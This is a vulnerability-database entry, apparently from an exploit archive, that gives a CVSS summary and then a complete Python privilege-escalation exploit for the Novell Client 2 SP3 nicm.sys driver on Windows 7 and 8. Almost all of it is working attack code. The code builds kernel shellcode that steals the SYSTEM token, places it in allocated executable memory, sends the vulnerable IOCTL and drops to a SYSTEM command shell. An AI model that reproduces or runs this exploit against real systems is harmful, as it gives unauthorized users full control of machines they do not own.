Novell Client 2 SP3 Privilege escalation exploit

2013-07-29 / 2013-10-21
Credit: Master Ryujin
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Novell Client 2 SP3 Privilege escalation exploit # Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0 # Thanks to Master Ryujin :) # The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public) # Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/ from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll if __name__ == '__main__': usage = "%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: WIN7, WIN8") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['WIN7','WIN8']: parser.print_help() sys.exit() OS = OS.upper() if OS == "WIN7": _KPROCESS = "\x50" # Offset for Win7 _TOKEN = "\xf8" # Offset for Win7 _UPID = "\xb4" # Offset for Win7 _APLINKS = "\xb8" # Offset for Win7 steal_token = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x08" sc = steal_token else: _KPROCESS = "\x80" # Offset for Win8 _TOKEN = "\xEC" # Offset for Win8 _UPID = "\xB4" # Offset for Win8 _APLINKS = "\xB8" # Offset for Win8 steal_token = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x08" sc = steal_token kernel_sc = "\x14\x00\x0d\x0d" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x18\x00\x0d\x0d" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x28\x00\x0d\x0d" kernel_sc+= sc print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8." print "[>] Finding the driver." GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = 0x0d0d0000 inut_size = 0x14 output_buffer = 0x0 output_size = 0x0 baseadd = c_int(0x0d0d0000) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write = c_int(0) print "[>] Allocating memory for our shellcode." dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) print "[>] Writing the shellcode." kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) print "[>] Dropping to a SYSTEM shell." os.system("cmd.exe /K cd C:\\windows\\system32")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top